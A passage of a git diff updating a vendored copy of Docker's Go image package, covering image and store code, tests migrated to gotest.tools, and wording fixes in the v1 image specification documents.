Docker that was used to build the image DockerVersion string `json:"docker_version,omitempty"` - // Author of the image + // Author is the name of the author that was specified when committing the image Author string `json:"author,omitempty"` // Config is the configuration of the container received from the client Config *container.Config `json:"config,omitempty"` - // Architecture is the hardware that the image is build and runs on + // Architecture is the hardware that the image is built and runs on Architecture string `json:"architecture,omitempty"` // OS is the 
operating system used to build and run the image OS string `json:"os,omitempty"` @@ -92,6 +96,24 @@ func (img *Image) RunConfig() *container.Config { return img.Config } +// BaseImgArch returns the image's architecture. If not populated, defaults to the host runtime arch. +func (img *Image) BaseImgArch() string { + arch := img.Architecture + if arch == "" { + arch = runtime.GOARCH + } + return arch +} + +// OperatingSystem returns the image's operating system. If not populated, defaults to the host runtime OS. +func (img *Image) OperatingSystem() string { + os := img.OS + if os == "" { + os = runtime.GOOS + } + return os +} + // MarshalJSON serializes the image to JSON. It sorts the top-level keys so // that JSON that's been manipulated by a push/pull cycle with a legacy // registry won't end up with a different key order. @@ -110,15 +132,63 @@ func (img *Image) MarshalJSON() ([]byte, error) { return json.Marshal(c) } +// ChildConfig is the configuration to apply to an Image to create a new +// Child image. Other properties of the image are copied from the parent. +type ChildConfig struct { + ContainerID string + Author string + Comment string + DiffID layer.DiffID + ContainerConfig *container.Config + Config *container.Config +} + +// NewChildImage creates a new Image as a child of this image. 
+func NewChildImage(img *Image, child ChildConfig, platform string) *Image { + isEmptyLayer := layer.IsEmpty(child.DiffID) + var rootFS *RootFS + if img.RootFS != nil { + rootFS = img.RootFS.Clone() + } else { + rootFS = NewRootFS() + } + + if !isEmptyLayer { + rootFS.Append(child.DiffID) + } + imgHistory := NewHistory( + child.Author, + child.Comment, + strings.Join(child.ContainerConfig.Cmd, " "), + isEmptyLayer) + + return &Image{ + V1Image: V1Image{ + DockerVersion: dockerversion.Version, + Config: child.Config, + Architecture: img.BaseImgArch(), + OS: platform, + Container: child.ContainerID, + ContainerConfig: *child.ContainerConfig, + Author: child.Author, + Created: imgHistory.Created, + }, + RootFS: rootFS, + History: append(img.History, imgHistory), + OSFeatures: img.OSFeatures, + OSVersion: img.OSVersion, + } +} + // History stores build commands that were used to create an image type History struct { - // Created timestamp for build point + // Created is the timestamp at which the image was created Created time.Time `json:"created"` - // Author of the build point + // Author is the name of the author that was specified when committing the image Author string `json:"author,omitempty"` - // CreatedBy keeps the Dockerfile command used while building image. + // CreatedBy keeps the Dockerfile command used while building the image CreatedBy string `json:"created_by,omitempty"` - // Comment is custom message set by the user when creating the image. + // Comment is the commit message that was set when committing the image Comment string `json:"comment,omitempty"` // EmptyLayer is set to true if this history item did not generate a // layer. 
Otherwise, the history item is associated with the next @@ -126,7 +196,19 @@ type History struct { EmptyLayer bool `json:"empty_layer,omitempty"` } -// Exporter provides interface for exporting and importing images +// NewHistory creates a new history struct from arguments, and sets the created +// time to the current time in UTC +func NewHistory(author, comment, createdBy string, isEmptyLayer bool) History { + return History{ + Author: author, + Created: time.Now().UTC(), + CreatedBy: createdBy, + Comment: comment, + EmptyLayer: isEmptyLayer, + } +} + +// Exporter provides interface for loading and saving images type Exporter interface { Load(io.ReadCloser, io.Writer, bool) error // TODO: Load(net.Context, io.ReadCloser, <- chan StatusMessage) error @@ -141,7 +223,7 @@ func NewFromJSON(src []byte) (*Image, error) { return nil, err } if img.RootFS == nil { - return nil, errors.New("Invalid image JSON, no RootFS key.") + return nil, errors.New("invalid image JSON, no RootFS key") } img.rawJSON = src diff --git a/vendor/github.com/docker/docker/image/image_test.go b/vendor/github.com/docker/docker/image/image_test.go index 525023b813..981be0b68c 100644 --- a/vendor/github.com/docker/docker/image/image_test.go +++ b/vendor/github.com/docker/docker/image/image_test.go @@ -1,10 +1,17 @@ -package image +package image // import "github.com/docker/docker/image" import ( "encoding/json" + "runtime" "sort" "strings" "testing" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/layer" + "github.com/google/go-cmp/cmp" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) const sampleImageJSON = `{ @@ -17,22 +24,15 @@ const sampleImageJSON = `{ } }` -func TestJSON(t *testing.T) { +func TestNewFromJSON(t *testing.T) { img, err := NewFromJSON([]byte(sampleImageJSON)) - if err != nil { - t.Fatal(err) - } - rawJSON := img.RawJSON() - if string(rawJSON) != sampleImageJSON { - t.Fatalf("Raw JSON of config didn't match: expected %+v, got %v", 
sampleImageJSON, rawJSON) - } + assert.NilError(t, err) + assert.Check(t, is.Equal(sampleImageJSON, string(img.RawJSON()))) } -func TestInvalidJSON(t *testing.T) { +func TestNewFromJSONWithInvalidJSON(t *testing.T) { _, err := NewFromJSON([]byte("{}")) - if err == nil { - t.Fatal("Expected JSON parse error") - } + assert.Check(t, is.Error(err, "invalid image JSON, no RootFS key")) } func TestMarshalKeyOrder(t *testing.T) { @@ -43,9 +43,7 @@ func TestMarshalKeyOrder(t *testing.T) { Architecture: "c", }, }) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) expectedOrder := []string{"architecture", "author", "comment"} var indexes []int @@ -57,3 +55,71 @@ func TestMarshalKeyOrder(t *testing.T) { t.Fatal("invalid key order in JSON: ", string(b)) } } + +func TestImage(t *testing.T) { + cid := "50a16564e727" + config := &container.Config{ + Hostname: "hostname", + Domainname: "domain", + User: "root", + } + os := runtime.GOOS + + img := &Image{ + V1Image: V1Image{ + Config: config, + }, + computedID: ID(cid), + } + + assert.Check(t, is.Equal(cid, img.ImageID())) + assert.Check(t, is.Equal(cid, img.ID().String())) + assert.Check(t, is.Equal(os, img.OperatingSystem())) + assert.Check(t, is.DeepEqual(config, img.RunConfig())) +} + +func TestImageOSNotEmpty(t *testing.T) { + os := "os" + img := &Image{ + V1Image: V1Image{ + OS: os, + }, + OSVersion: "osversion", + } + assert.Check(t, is.Equal(os, img.OperatingSystem())) +} + +func TestNewChildImageFromImageWithRootFS(t *testing.T) { + rootFS := NewRootFS() + rootFS.Append(layer.DiffID("ba5e")) + parent := &Image{ + RootFS: rootFS, + History: []History{ + NewHistory("a", "c", "r", false), + }, + } + childConfig := ChildConfig{ + DiffID: layer.DiffID("abcdef"), + Author: "author", + Comment: "comment", + ContainerConfig: &container.Config{ + Cmd: []string{"echo", "foo"}, + }, + Config: &container.Config{}, + } + + newImage := NewChildImage(parent, childConfig, "platform") + expectedDiffIDs := 
[]layer.DiffID{layer.DiffID("ba5e"), layer.DiffID("abcdef")} + assert.Check(t, is.DeepEqual(expectedDiffIDs, newImage.RootFS.DiffIDs)) + assert.Check(t, is.Equal(childConfig.Author, newImage.Author)) + assert.Check(t, is.DeepEqual(childConfig.Config, newImage.Config)) + assert.Check(t, is.DeepEqual(*childConfig.ContainerConfig, newImage.ContainerConfig)) + assert.Check(t, is.Equal("platform", newImage.OS)) + assert.Check(t, is.DeepEqual(childConfig.Config, newImage.Config)) + + assert.Check(t, is.Len(newImage.History, 2)) + assert.Check(t, is.Equal(childConfig.Comment, newImage.History[1].Comment)) + + assert.Check(t, !cmp.Equal(parent.RootFS.DiffIDs, newImage.RootFS.DiffIDs), + "RootFS should be copied not mutated") +} diff --git a/vendor/github.com/docker/docker/image/rootfs.go b/vendor/github.com/docker/docker/image/rootfs.go index 7b24e3ed1e..84843e10c6 100644 --- a/vendor/github.com/docker/docker/image/rootfs.go +++ b/vendor/github.com/docker/docker/image/rootfs.go @@ -1,10 +1,10 @@ -package image +package image // import "github.com/docker/docker/image" import ( "runtime" - "github.com/Sirupsen/logrus" "github.com/docker/docker/layer" + "github.com/sirupsen/logrus" ) // TypeLayers is used for RootFS.Type for filesystems organized into layers. @@ -34,6 +34,14 @@ func (r *RootFS) Append(id layer.DiffID) { r.DiffIDs = append(r.DiffIDs, id) } +// Clone returns a copy of the RootFS +func (r *RootFS) Clone() *RootFS { + newRoot := NewRootFS() + newRoot.Type = r.Type + newRoot.DiffIDs = append(r.DiffIDs) + return newRoot +} + // ChainID returns the ChainID for the top layer in RootFS. 
func (r *RootFS) ChainID() layer.ChainID { if runtime.GOOS == "windows" && r.Type == typeLayersWithBase { diff --git a/vendor/github.com/docker/docker/image/spec/README.md b/vendor/github.com/docker/docker/image/spec/README.md new file mode 100644 index 0000000000..9769af781a --- /dev/null +++ b/vendor/github.com/docker/docker/image/spec/README.md @@ -0,0 +1,46 @@ +# Docker Image Specification v1. + +This directory contains documents about Docker Image Specification v1.X. + +The v1 file layout and manifests are no longer used in Moby and Docker, except in `docker save` and `docker load`. + +However, v1 Image JSON (`application/vnd.docker.container.image.v1+json`) has been still widely +used and officially adopted in [V2 manifest](https://github.com/docker/distribution/blob/master/docs/spec/manifest-v2-2.md) +and in [OCI Image Format Specification](https://github.com/opencontainers/image-spec). + +## v1.X rough Changelog + +All 1.X versions are compatible with older ones. + +### [v1.2](v1.2.md) + +* Implemented in Docker v1.12 (July, 2016) +* The official spec document was written in August 2016 ([#25750](https://github.com/moby/moby/pull/25750)) + +Changes: + +* `Healthcheck` struct was added to Image JSON + +### [v1.1](v1.1.md) + +* Implemented in Docker v1.10 (February, 2016) +* The official spec document was written in April 2016 ([#22264](https://github.com/moby/moby/pull/22264)) + +Changes: + +* IDs were made into SHA256 digest values rather than random values +* Layer directory names were made into deterministic values rather than random ID values +* `manifest.json` was added + +### [v1](v1.md) + +* The initial revision +* The official spec document was written in late 2014 ([#9560](https://github.com/moby/moby/pull/9560)), but actual implementations had existed even earlier + + +## Related specifications + +* [Open Containers Initiative (OCI) Image Format Specification v1.0.0](https://github.com/opencontainers/image-spec/tree/v1.0.0) +* [Docker Image 
Manifest Version 2, Schema 2](https://github.com/docker/distribution/blob/master/docs/spec/manifest-v2-2.md) +* [Docker Image Manifest Version 2, Schema 1](https://github.com/docker/distribution/blob/master/docs/spec/manifest-v2-1.md) (*DEPRECATED*) +* [Docker Registry HTTP API V2](https://docs.docker.com/registry/spec/api/) diff --git a/vendor/github.com/docker/docker/image/spec/v1.1.md b/vendor/github.com/docker/docker/image/spec/v1.1.md index 83f138011d..de74d91a19 100644 --- a/vendor/github.com/docker/docker/image/spec/v1.1.md +++ b/vendor/github.com/docker/docker/image/spec/v1.1.md @@ -88,7 +88,7 @@ This specification uses the following terms: A tag serves to map a descriptive, user-given name to any single image ID. Tag values are limited to the set of characters [a-zA-Z0-9_.-], except they may not start with a . - or - character. Tags are limited to 127 characters. + or - character. Tags are limited to 128 characters.
Repository @@ -99,7 +99,7 @@ This specification uses the following terms: my-app:3.1.4, my-app is the Repository component of the name. A repository name is made up of slash-separated name components, optionally prefixed by a DNS hostname. The hostname - must follow comply with standard DNS rules, but may not contain + must comply with standard DNS rules, but may not contain _ characters. If a hostname is present, it may optionally be followed by a port number in the format :8080. Name components may contain lowercase characters, digits, and @@ -223,9 +223,7 @@ whitespace. It has been added to this example for clarity. container using the image. This field can be null, in which case any execution parameters should be specified at creation of the container. -

Container RunConfig Field Descriptions

-
User string @@ -234,9 +232,7 @@ whitespace. It has been added to this example for clarity.

The username or UID which the process in the container should run as. This acts as a default value to use when the value is not specified when creating a container.

-

All of the following are valid:

-
  • user
  • uid
  • @@ -245,7 +241,6 @@ whitespace. It has been added to this example for clarity.
  • uid:group
  • user:gid
-

If group/gid is not specified, the default group and supplementary groups of the given user/uid in /etc/passwd @@ -284,13 +279,11 @@ whitespace. It has been added to this example for clarity. map[string]struct{} and is represented in JSON as an object mapping its keys to an empty object. Here is an example: -

{
     "8080": {},
     "53/udp": {},
     "2356/tcp": {}
 }
- Its keys can be in the format of:
  • @@ -304,10 +297,8 @@ whitespace. It has been added to this example for clarity.
with the default protocol being "tcp" if not - specified. - - These values act as defaults and are merged with any specified - when creating a container. + specified. These values act as defaults and are merged with any + specified when creating a container.
Env array of strings @@ -367,7 +358,6 @@ whitespace. It has been added to this example for clarity. The rootfs key references the layer content addresses used by the image. This makes the image config hash depend on the filesystem hash. rootfs has two subkeys: -
  • type is usually set to layers. @@ -376,10 +366,7 @@ whitespace. It has been added to this example for clarity. diff_ids is an array of layer content hashes (DiffIDs), in order from bottom-most to top-most.
- - Here is an example rootfs section: -
"rootfs": {
   "diff_ids": [
     "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1",
@@ -396,7 +383,6 @@ whitespace. It has been added to this example for clarity.
         history is an array of objects describing the history of
         each layer. The array is ordered from bottom-most layer to top-most
         layer. The object has the following fields.
-
         
  • created: Creation time, expressed as a ISO-8601 formatted diff --git a/vendor/github.com/docker/docker/image/spec/v1.2.md b/vendor/github.com/docker/docker/image/spec/v1.2.md index 6c641cafec..2ea3feec92 100644 --- a/vendor/github.com/docker/docker/image/spec/v1.2.md +++ b/vendor/github.com/docker/docker/image/spec/v1.2.md @@ -88,7 +88,7 @@ This specification uses the following terms: A tag serves to map a descriptive, user-given name to any single image ID. Tag values are limited to the set of characters [a-zA-Z0-9_.-], except they may not start with a . - or - character. Tags are limited to 127 characters. + or - character. Tags are limited to 128 characters.
    Repository @@ -99,7 +99,7 @@ This specification uses the following terms: my-app:3.1.4, my-app is the Repository component of the name. A repository name is made up of slash-separated name components, optionally prefixed by a DNS hostname. The hostname - must follow comply with standard DNS rules, but may not contain + must comply with standard DNS rules, but may not contain _ characters. If a hostname is present, it may optionally be followed by a port number in the format :8080. Name components may contain lowercase characters, digits, and @@ -223,9 +223,7 @@ whitespace. It has been added to this example for clarity. container using the image. This field can be null, in which case any execution parameters should be specified at creation of the container. -

    Container RunConfig Field Descriptions

    -
    User string @@ -234,9 +232,7 @@ whitespace. It has been added to this example for clarity.

    The username or UID which the process in the container should run as. This acts as a default value to use when the value is not specified when creating a container.

    -

    All of the following are valid:

    -
    • user
    • uid
    • @@ -245,7 +241,6 @@ whitespace. It has been added to this example for clarity.
    • uid:group
    • user:gid
    -

    If group/gid is not specified, the default group and supplementary groups of the given user/uid in /etc/passwd @@ -284,13 +279,11 @@ whitespace. It has been added to this example for clarity. map[string]struct{} and is represented in JSON as an object mapping its keys to an empty object. Here is an example: -

    {
         "8080": {},
         "53/udp": {},
         "2356/tcp": {}
     }
    - Its keys can be in the format of:
    • @@ -304,10 +297,8 @@ whitespace. It has been added to this example for clarity.
    with the default protocol being "tcp" if not - specified. - - These values act as defaults and are merged with any specified - when creating a container. + specified. These values act as defaults and are merged with + any specified when creating a container.
    Env array of strings @@ -364,7 +355,6 @@ whitespace. It has been added to this example for clarity.
  • ["CMD", arg1, arg2, ...] : exec arguments directly
  • ["CMD-SHELL", command] : run command with system's default shell
- The test command should exit with a status of 0 if the container is healthy, or with 1 if it is unhealthy. @@ -387,12 +377,10 @@ whitespace. It has been added to this example for clarity. The number of consecutive failures needed to consider a container as unhealthy.
- In each case, the field can be omitted to indicate that the - value should be inherited from the base layer. - - These values act as defaults and are merged with any specified - when creating a container. + value should be inherited from the base layer. These values act + as defaults and are merged with any specified when creating a + container.
Volumes struct @@ -426,7 +414,6 @@ whitespace. It has been added to this example for clarity. The rootfs key references the layer content addresses used by the image. This makes the image config hash depend on the filesystem hash. rootfs has two subkeys: -
  • type is usually set to layers. @@ -435,10 +422,7 @@ whitespace. It has been added to this example for clarity. diff_ids is an array of layer content hashes (DiffIDs), in order from bottom-most to top-most.
- - Here is an example rootfs section: -
"rootfs": {
   "diff_ids": [
     "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1",
@@ -455,7 +439,6 @@ whitespace. It has been added to this example for clarity.
         history is an array of objects describing the history of
         each layer. The array is ordered from bottom-most layer to top-most
         layer. The object has the following fields.
-
         
  • created: Creation time, expressed as a ISO-8601 formatted @@ -478,9 +461,7 @@ whitespace. It has been added to this example for clarity. filesystem).
- -Here is an example history section: - + Here is an example history section:
"history": [
   {
     "created": "2015-10-31T22:22:54.690851953Z",
diff --git a/vendor/github.com/docker/docker/image/spec/v1.md b/vendor/github.com/docker/docker/image/spec/v1.md
index 57a599b8ff..c1415947f1 100644
--- a/vendor/github.com/docker/docker/image/spec/v1.md
+++ b/vendor/github.com/docker/docker/image/spec/v1.md
@@ -17,12 +17,10 @@ This specification uses the following terms:
     
Images are composed of layers. Image layer is a general term which may be used to refer to one or both of the following: -
  1. The metadata for the layer, described in the JSON format.
  2. The filesystem changes described by a layer.
- To refer to the former you may use the term Layer JSON or Layer Metadata. To refer to the latter you may use the term Image Filesystem Changeset or Image Diff. @@ -92,7 +90,7 @@ This specification uses the following terms: often referred to as a tag as well, though it strictly refers to the full name of an image. Acceptable values for a tag suffix are implementation specific, but they SHOULD be limited to the set of - alphanumeric characters [a-zA-z0-9], punctuation + alphanumeric characters [a-zA-Z0-9], punctuation characters [._-], and MUST NOT contain a : character.
@@ -105,7 +103,7 @@ This specification uses the following terms: my-app:3.1.4, my-app is the Repository component of the name. Acceptable values for repository name are implementation specific, but they SHOULD be limited to the set of - alphanumeric characters [a-zA-z0-9], and punctuation + alphanumeric characters [a-zA-Z0-9], and punctuation characters [._-], however it MAY contain additional / and : characters for organizational purposes, with the last : character being interpreted @@ -244,9 +242,7 @@ Here is an example image JSON file: container using the image. This field can be null, in which case any execution parameters should be specified at creation of the container. -

Container RunConfig Field Descriptions

-
User string @@ -255,9 +251,7 @@ Here is an example image JSON file:

The username or UID which the process in the container should run as. This acts as a default value to use when the value is not specified when creating a container.

-

All of the following are valid:

-
  • user
  • uid
  • @@ -266,7 +260,6 @@ Here is an example image JSON file:
  • uid:group
  • user:gid
-

If group/gid is not specified, the default group and supplementary groups of the given user/uid in /etc/passwd @@ -305,13 +298,11 @@ Here is an example image JSON file: map[string]struct{} and is represented in JSON as an object mapping its keys to an empty object. Here is an example: -

{
     "8080": {},
     "53/udp": {},
     "2356/tcp": {}
 }
- Its keys can be in the format of:
  • @@ -325,9 +316,7 @@ Here is an example image JSON file:
with the default protocol being "tcp" if not - specified. - - These values act as defaults and are merged with any specified + specified. These values act as defaults and are merged with any specified when creating a container.
@@ -440,7 +429,7 @@ f60c56784b83/ my-app-tools ``` -This example change is going add a configuration directory at `/etc/my-app.d` +This example change is going to add a configuration directory at `/etc/my-app.d` which contains a default config file. There's also a change to the `my-app-tools` binary to handle the config layout change. The `f60c56784b83` directory then looks like this: @@ -502,21 +491,21 @@ For example, here's what the full archive of `library/busybox` is (displayed in ``` . ├── 5785b62b697b99a5af6cd5d0aabc804d5748abbb6d3d07da5d1d3795f2dcc83e -│   ├── VERSION -│   ├── json -│   └── layer.tar +│ ├── VERSION +│ ├── json +│ └── layer.tar ├── a7b8b41220991bfc754d7ad445ad27b7f272ab8b4a2c175b9512b97471d02a8a -│   ├── VERSION -│   ├── json -│   └── layer.tar +│ ├── VERSION +│ ├── json +│ └── layer.tar ├── a936027c5ca8bf8f517923169a233e391cbb38469a75de8383b5228dc2d26ceb -│   ├── VERSION -│   ├── json -│   └── layer.tar +│ ├── VERSION +│ ├── json +│ └── layer.tar ├── f60c56784b832dd990022afc120b8136ab3da9528094752ae13fe63a2d28dc8c -│   ├── VERSION -│   ├── json -│   └── layer.tar +│ ├── VERSION +│ ├── json +│ └── layer.tar └── repositories ``` diff --git a/vendor/github.com/docker/docker/image/store.go b/vendor/github.com/docker/docker/image/store.go index b61c456097..9fd7d7dcf3 100644 --- a/vendor/github.com/docker/docker/image/store.go +++ b/vendor/github.com/docker/docker/image/store.go @@ -1,14 +1,17 @@ -package image +package image // import "github.com/docker/docker/image" import ( "encoding/json" - "errors" "fmt" "sync" + "time" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/digestset" "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/system" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // Store is an interface for creating and accessing images @@ -19,9 +22,12 @@ type Store interface { Search(partialID string) (ID, error) 
SetParent(id ID, parent ID) error GetParent(id ID) (ID, error) + SetLastUpdated(id ID) error + GetLastUpdated(id ID) (time.Time, error) Children(id ID) []ID Map() map[ID]*Image Heads() map[ID]*Image + Len() int } // LayerGetReleaser is a minimal interface for getting and releasing images. @@ -36,20 +42,20 @@ type imageMeta struct { } type store struct { - sync.Mutex - ls LayerGetReleaser + sync.RWMutex + lss map[string]LayerGetReleaser images map[ID]*imageMeta fs StoreBackend - digestSet *digest.Set + digestSet *digestset.Set } -// NewImageStore returns new store object for given layer store -func NewImageStore(fs StoreBackend, ls LayerGetReleaser) (Store, error) { +// NewImageStore returns new store object for given set of layer stores +func NewImageStore(fs StoreBackend, lss map[string]LayerGetReleaser) (Store, error) { is := &store{ - ls: ls, + lss: lss, images: make(map[ID]*imageMeta), fs: fs, - digestSet: digest.NewSet(), + digestSet: digestset.NewSet(), } // load all current images and retain layers @@ -69,8 +75,15 @@ func (is *store) restore() error { } var l layer.Layer if chainID := img.RootFS.ChainID(); chainID != "" { - l, err = is.ls.Get(chainID) + if !system.IsOSSupported(img.OperatingSystem()) { + return system.ErrNotSupportedOperatingSystem + } + l, err = is.lss[img.OperatingSystem()].Get(chainID) if err != nil { + if err == layer.ErrLayerDoesNotExist { + logrus.Errorf("layer does not exist, not restoring image %v, %v, %s", dgst, chainID, img.OperatingSystem()) + return nil + } return err } } @@ -144,9 +157,12 @@ func (is *store) Create(config []byte) (ID, error) { var l layer.Layer if layerID != "" { - l, err = is.ls.Get(layerID) + if !system.IsOSSupported(img.OperatingSystem()) { + return "", system.ErrNotSupportedOperatingSystem + } + l, err = is.lss[img.OperatingSystem()].Get(layerID) if err != nil { - return "", err + return "", errors.Wrapf(err, "failed to get layer %s", layerID) } } @@ -164,16 +180,21 @@ func (is *store) Create(config []byte) 
(ID, error) { return imageID, nil } -func (is *store) Search(term string) (ID, error) { - is.Lock() - defer is.Unlock() +type imageNotFoundError string + +func (e imageNotFoundError) Error() string { + return "No such image: " + string(e) +} + +func (imageNotFoundError) NotFound() {} +func (is *store) Search(term string) (ID, error) { dgst, err := is.digestSet.Lookup(term) if err != nil { - if err == digest.ErrDigestNotFound { - err = fmt.Errorf("No such image: %s", term) + if err == digestset.ErrDigestNotFound { + err = imageNotFoundError(term) } - return "", err + return "", errors.WithStack(err) } return IDFromDigest(dgst), nil } @@ -208,6 +229,13 @@ func (is *store) Delete(id ID) ([]layer.Metadata, error) { if imageMeta == nil { return nil, fmt.Errorf("unrecognized image ID %s", id.String()) } + img, err := is.Get(id) + if err != nil { + return nil, fmt.Errorf("unrecognized image %s, %v", id.String(), err) + } + if !system.IsOSSupported(img.OperatingSystem()) { + return nil, fmt.Errorf("unsupported image operating system %q", img.OperatingSystem()) + } for id := range imageMeta.children { is.fs.DeleteMetadata(id.Digest(), "parent") } @@ -222,7 +250,7 @@ func (is *store) Delete(id ID) ([]layer.Metadata, error) { is.fs.Delete(id.Digest()) if imageMeta.layer != nil { - return is.ls.Release(imageMeta.layer) + return is.lss[img.OperatingSystem()].Release(imageMeta.layer) } return nil, nil } @@ -249,9 +277,25 @@ func (is *store) GetParent(id ID) (ID, error) { return ID(d), nil // todo: validate? 
} +// SetLastUpdated time for the image ID to the current time +func (is *store) SetLastUpdated(id ID) error { + lastUpdated := []byte(time.Now().Format(time.RFC3339Nano)) + return is.fs.SetMetadata(id.Digest(), "lastUpdated", lastUpdated) +} + +// GetLastUpdated time for the image ID +func (is *store) GetLastUpdated(id ID) (time.Time, error) { + bytes, err := is.fs.GetMetadata(id.Digest(), "lastUpdated") + if err != nil || len(bytes) == 0 { + // No lastUpdated time + return time.Time{}, nil + } + return time.Parse(time.RFC3339Nano, string(bytes)) +} + func (is *store) Children(id ID) []ID { - is.Lock() - defer is.Unlock() + is.RLock() + defer is.RUnlock() return is.children(id) } @@ -275,8 +319,8 @@ func (is *store) Map() map[ID]*Image { } func (is *store) imagesMap(all bool) map[ID]*Image { - is.Lock() - defer is.Unlock() + is.RLock() + defer is.RUnlock() images := make(map[ID]*Image) @@ -293,3 +337,9 @@ func (is *store) imagesMap(all bool) map[ID]*Image { } return images } + +func (is *store) Len() int { + is.RLock() + defer is.RUnlock() + return len(is.images) +} diff --git a/vendor/github.com/docker/docker/image/store_test.go b/vendor/github.com/docker/docker/image/store_test.go index 50f8aa8b84..0edf3282af 100644 --- a/vendor/github.com/docker/docker/image/store_test.go +++ b/vendor/github.com/docker/docker/image/store_test.go @@ -1,292 +1,189 @@ -package image +package image // import "github.com/docker/docker/image" import ( - "io/ioutil" - "os" + "fmt" + "runtime" "testing" - "github.com/docker/distribution/digest" "github.com/docker/docker/layer" + "github.com/opencontainers/go-digest" + "gotest.tools/assert" + "gotest.tools/assert/cmp" ) func TestRestore(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } + fs, cleanup := defaultFSStoreBackend(t) + defer cleanup() id1, err := 
fs.Set([]byte(`{"comment": "abc", "rootfs": {"type": "layers"}}`)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + _, err = fs.Set([]byte(`invalid`)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + id2, err := fs.Set([]byte(`{"comment": "def", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + err = fs.SetMetadata(id2, "parent", []byte(id1)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - is, err := NewImageStore(fs, &mockLayerGetReleaser{}) - if err != nil { - t.Fatal(err) - } + mlgrMap := make(map[string]LayerGetReleaser) + mlgrMap[runtime.GOOS] = &mockLayerGetReleaser{} + is, err := NewImageStore(fs, mlgrMap) + assert.NilError(t, err) - imgs := is.Map() - if actual, expected := len(imgs), 2; actual != expected { - t.Fatalf("invalid images length, expected 2, got %q", len(imgs)) - } + assert.Check(t, cmp.Len(is.Map(), 2)) img1, err := is.Get(ID(id1)) - if err != nil { - t.Fatal(err) - } - - if actual, expected := img1.computedID, ID(id1); actual != expected { - t.Fatalf("invalid image ID: expected %q, got %q", expected, actual) - } - - if actual, expected := img1.computedID.String(), string(id1); actual != expected { - t.Fatalf("invalid image ID string: expected %q, got %q", expected, actual) - } + assert.NilError(t, err) + assert.Check(t, cmp.Equal(ID(id1), img1.computedID)) + assert.Check(t, cmp.Equal(string(id1), img1.computedID.String())) img2, err := is.Get(ID(id2)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + assert.Check(t, cmp.Equal("abc", img1.Comment)) + assert.Check(t, cmp.Equal("def", img2.Comment)) - if actual, expected := img1.Comment, "abc"; actual != expected { - t.Fatalf("invalid comment for image1: expected %q, got %q", expected, actual) - } + _, err = is.GetParent(ID(id1)) + assert.ErrorContains(t, err, "failed to read metadata") - if actual, 
expected := img2.Comment, "def"; actual != expected { - t.Fatalf("invalid comment for image2: expected %q, got %q", expected, actual) - } - - p, err := is.GetParent(ID(id1)) - if err == nil { - t.Fatal("expected error for getting parent") - } - - p, err = is.GetParent(ID(id2)) - if err != nil { - t.Fatal(err) - } - if actual, expected := p, ID(id1); actual != expected { - t.Fatalf("invalid parent: expected %q, got %q", expected, actual) - } + p, err := is.GetParent(ID(id2)) + assert.NilError(t, err) + assert.Check(t, cmp.Equal(ID(id1), p)) children := is.Children(ID(id1)) - if len(children) != 1 { - t.Fatalf("invalid children length: %q", len(children)) - } - if actual, expected := children[0], ID(id2); actual != expected { - t.Fatalf("invalid child for id1: expected %q, got %q", expected, actual) - } - - heads := is.Heads() - if actual, expected := len(heads), 1; actual != expected { - t.Fatalf("invalid images length: expected %q, got %q", expected, actual) - } + assert.Check(t, cmp.Len(children, 1)) + assert.Check(t, cmp.Equal(ID(id2), children[0])) + assert.Check(t, cmp.Len(is.Heads(), 1)) sid1, err := is.Search(string(id1)[:10]) - if err != nil { - t.Fatal(err) - } - if actual, expected := sid1, ID(id1); actual != expected { - t.Fatalf("searched ID mismatch: expected %q, got %q", expected, actual) - } + assert.NilError(t, err) + assert.Check(t, cmp.Equal(ID(id1), sid1)) sid1, err = is.Search(digest.Digest(id1).Hex()[:6]) - if err != nil { - t.Fatal(err) - } - if actual, expected := sid1, ID(id1); actual != expected { - t.Fatalf("searched ID mismatch: expected %q, got %q", expected, actual) - } + assert.NilError(t, err) + assert.Check(t, cmp.Equal(ID(id1), sid1)) invalidPattern := digest.Digest(id1).Hex()[1:6] _, err = is.Search(invalidPattern) - if err == nil { - t.Fatalf("expected search for %q to fail", invalidPattern) - } - + assert.ErrorContains(t, err, "No such image") } func TestAddDelete(t *testing.T) { - tmpdir, err := ioutil.TempDir("", 
"images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } - - is, err := NewImageStore(fs, &mockLayerGetReleaser{}) - if err != nil { - t.Fatal(err) - } + is, cleanup := defaultImageStore(t) + defer cleanup() id1, err := is.Create([]byte(`{"comment": "abc", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`)) - if err != nil { - t.Fatal(err) - } - - if actual, expected := id1, ID("sha256:8d25a9c45df515f9d0fe8e4a6b1c64dd3b965a84790ddbcc7954bb9bc89eb993"); actual != expected { - t.Fatalf("create ID mismatch: expected %q, got %q", expected, actual) - } + assert.NilError(t, err) + assert.Check(t, cmp.Equal(ID("sha256:8d25a9c45df515f9d0fe8e4a6b1c64dd3b965a84790ddbcc7954bb9bc89eb993"), id1)) img, err := is.Get(id1) - if err != nil { - t.Fatal(err) - } - - if actual, expected := img.Comment, "abc"; actual != expected { - t.Fatalf("invalid comment in image: expected %q, got %q", expected, actual) - } + assert.NilError(t, err) + assert.Check(t, cmp.Equal("abc", 